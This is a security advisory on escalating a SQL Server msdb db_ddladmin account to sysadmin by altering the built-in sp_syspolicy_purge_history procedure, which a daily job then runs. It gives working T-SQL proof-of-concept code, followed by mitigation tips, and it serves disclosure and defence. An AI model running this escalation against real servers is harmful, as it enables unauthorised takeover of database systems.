Title: SQL Server Privilege Escalation from db_ddladmin to sysadmin Product: Microsoft SQL Server Affected Version(s): 2014,2016,2017,2019,2022 Tested Version(s): 2014,2016,2017,2019,2022 Risk Level: Medium Author of Advisory: Emad Al-Mousa Overview: Privilege Escalation is a serious security attack that attackers seek to compromise IT infrastructure and systems. attackers will either exploit vulnerabilites or misconfiguration in the system to escalate their permissions and take over the whole system. ***************************************** Vulnerability Details: By design when you install SQL Server database engine a job is created called “syspolicy_purge_history” , and this job by design will run every day. This job can be weaponized for privilege escalation attack. attacker will require to compromise a database account that is added in MSDB system database and is granted db_ddladmin role. ***************************************** Proof of Concept (PoC): I will create a dummy account called “toto” (for the sake of simulation it will be SQL Authenticated account): USE [master] GO CREATE LOGIN [toto] WITH PASSWORD=N'toto', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO And, then I will add the account as database user in system database MSDB with db_ddladmin permission: USE [msdb] GO CREATE USER [toto] FOR LOGIN [toto] GO USE [msdb] GO ALTER ROLE [db_ddladmin] ADD MEMBER [toto] GO Then, I will execute the following modification code against the procedure: USE [msdb] GO ALTER PROCEDURE [dbo].[sp_syspolicy_purge_history] AS BEGIN ALTER SERVER ROLE [sysadmin] ADD MEMBER [toto] END The next scheduled run-time for the job syspolicy_purge_history, the account toto will be escalated to SYSADMIN role, which means he will he/she will take over the whole SQL Server database system. -***- To protect from such attacks you will need to follow these security tips: Implement in-place auditing for privilege escalation attacks [smart auditing….don’t audit everything as auditing will impose performance overhead] Implement least privilege concept in your environment, do not grant any account extra permissions that can be weaponized for security breach. Strong Identity and account management approach should be in-place, passwords policies are important to make brute force attacks challenging. patch your environments , and follow best security practices. ***************************************** References: https://databasesecurityninja.wordpress.com/2024/01/07/sql-server-privilege-escalation-from-db_ddladmin-to-sysadmin/ https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver16